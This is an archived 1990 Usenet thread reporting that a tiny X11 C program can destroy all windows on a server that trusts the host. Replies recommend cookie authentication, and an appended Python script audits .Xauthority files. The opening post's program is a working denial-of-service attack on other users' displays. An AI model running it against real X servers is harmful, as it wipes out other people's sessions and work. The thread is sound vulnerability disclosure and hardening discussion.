randy@uokmax.ecn.uoknor.edu (Longshot) (02/09/90)
This is a potential problem, and I'm sure I'm not the first to find it:

    #include <X11/Xlib.h>
    #include <X11/Xutil.h>
    #include <stdio.h>
    #include <stdlib.h>   /* exit() */

    int main(int argc, char **argv)
    {
        Display *mydisplay;

        /* Empty name: connect to the server named by $DISPLAY */
        mydisplay = XOpenDisplay("");
        if (!mydisplay) {
            fprintf(stderr,"Could not open display.\n");
            exit(1);
        }
        /* Destroys every child of the root window, whichever client owns it */
        XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay));
        XCloseDisplay(mydisplay);
        return 0;
    }

Needless to say, if you are on a host that is trusted to an X server, this
small segment can wreck them. After this executes, ALL windows on the server
bound to DISPLAY die quickly and completely. I first had someone run this from
his X environment (an xterm running from twm), and then I ran it on an ascii
terminal connected to a host that was trusted to the X server.

Obviously, if a host is not permitted to a server, this program will die, but
here we run our servers on Suns and Mac II's, and most of the applications on
our Encore, which is faster and can handle the load. The same Multimax averages
60-80 users during peak hours, any of which who know X could do this.

Doesn't X keep some sort of identifier in a window structure or display
structure that identifies the owner?

This is nasty!

Randy
--
Randy J. Ray University of Oklahoma, Norman Campus (405)/325-5370
!chinet!uokmax!randy randy@uokmax.uucp randy@uokmax.ecn.uoknor.edu
Flaming makes you feel better, sorta like popping the little plastic bubbles in
packaging material. -Tim Perala

argv%turnpike@Sun.COM (Dan Heller) (02/09/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes:
> This is a potential problem, and I'm sure I'm not the first to find it:
> XDestroySubwindows(mydisplay,DefaultRootWindow(mydisplay));
> Needless to say, if you are on a host that is trusted to an X server, this
> small segment can wreck them.
> This is nasty!

Patient: Doctor, it hurts when I do this.
Doctor: Then don't do that.

:-D

dan
-----------------------------------------------------------
O'Reilly && Associates
argv@sun.com / argv@ora.com
632 Petaluma Ave, Sebastopol, CA 95472
800-338-NUTS, in CA: 800-533-NUTS, FAX 707-829-0104

stripes@eng.umd.edu (Joshua Osborne) (02/10/90)
In article <1990Feb8.211508.2581@uokmax.uucp> randy@uokmax.ecn.uoknor.edu (Longshot) writes:
>This is a potential problem, and I'm sure I'm not the first to find it:

You aren't, and this isn't the worst (be clever... read the man pages for xterm).

[...]
>Needless to say, if you are on a host that is trusted to an X server, this
>small segment can wreck them.
[...]

Don't trust any hosts. Get X11R4 and use MIT-COOKIE-1 (you need to start X
with the -auth option, and use xauth, or the Xau lib functions to make yourself
a .Xauthority file). Then you only need to trust 2 people, you and root.
--
stripes@wam.umd.edu             "Security for Unix is like
Josh_Osborne@Real_World,The      Mutitasking for MS-DOS"
"The dyslexic porgramer"                  - Kevin Lockwood
Who needs friends when you can sit alone in your room and drink?
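
As an added example (not code from any poster in this thread): a small audit of a .Xauthority file, where the cookie setup recommended in the last post keeps its secret. It decodes the records and flags a file that other users can read or a cookie that is not 16 bytes; the sample records, host name and address are constructed, and the 16-byte expectation assumes the standard 128-bit cookie stored under the protocol name MIT-MAGIC-COOKIE-1.

```python
import struct

FAMILIES = {0: "Internet", 6: "Internet6", 256: "Local", 65535: "Wild"}
COOKIE = b"MIT-MAGIC-COOKIE-1"

def parse_xauthority(blob):
    """Decode records: 2-byte big-endian family, then four length-prefixed fields."""
    pos = 0
    def take(n):
        nonlocal pos
        if pos + n > len(blob):
            raise ValueError("truncated .Xauthority record")
        pos += n
        return blob[pos - n:pos]
    entries = []
    while pos < len(blob):
        family = struct.unpack(">H", take(2))[0]
        # Field order: address, display number, auth protocol name, auth data
        addr, disp, name, data = (take(struct.unpack(">H", take(2))[0]) for _ in range(4))
        # Internet addresses are raw bytes; other families carry a host name
        host = ".".join(map(str, addr)) if family == 0 else addr.decode("latin-1")
        entries.append({"family": FAMILIES.get(family, str(family)), "address": host,
                        "display": disp.decode("latin-1"), "name": name,
                        "data_len": len(data)})  # keep the length, never the secret
    return entries

def audit(entries, mode):
    """Return findings for parsed records plus the file's permission bits."""
    findings = []
    if mode & 0o077:
        findings.append("file is accessible to group/other; cookies readable by other users")
    if not any(e["name"] == COOKIE for e in entries):
        findings.append("no MIT-MAGIC-COOKIE-1 record present")
    for e in entries:
        if e["name"] == COOKIE and e["data_len"] != 16:
            findings.append("%s:%s cookie is %d bytes, expected 16"
                            % (e["address"], e["display"], e["data_len"]))
    return findings

def _record(family, address, display, name, data):
    """Build one record; used only for the constructed sample below."""
    out = struct.pack(">H", family)
    for field in (address, display, name, data):
        out += struct.pack(">H", len(field)) + field
    return out

# Constructed sample: one proper 16-byte cookie, one short 4-byte cookie.
SAMPLE = (_record(256, b"examplehost", b"0", COOKIE, bytes(range(16))) +
          _record(0, bytes([192, 0, 2, 10]), b"1", COOKIE, b"\x01\x02\x03\x04"))

if __name__ == "__main__":
    print("\n".join(audit(parse_xauthority(SAMPLE), 0o644)))
```

On a real system, read the file named by $XAUTHORITY (or ~/.Xauthority) in binary mode and pass `os.stat(path).st_mode` as `mode`.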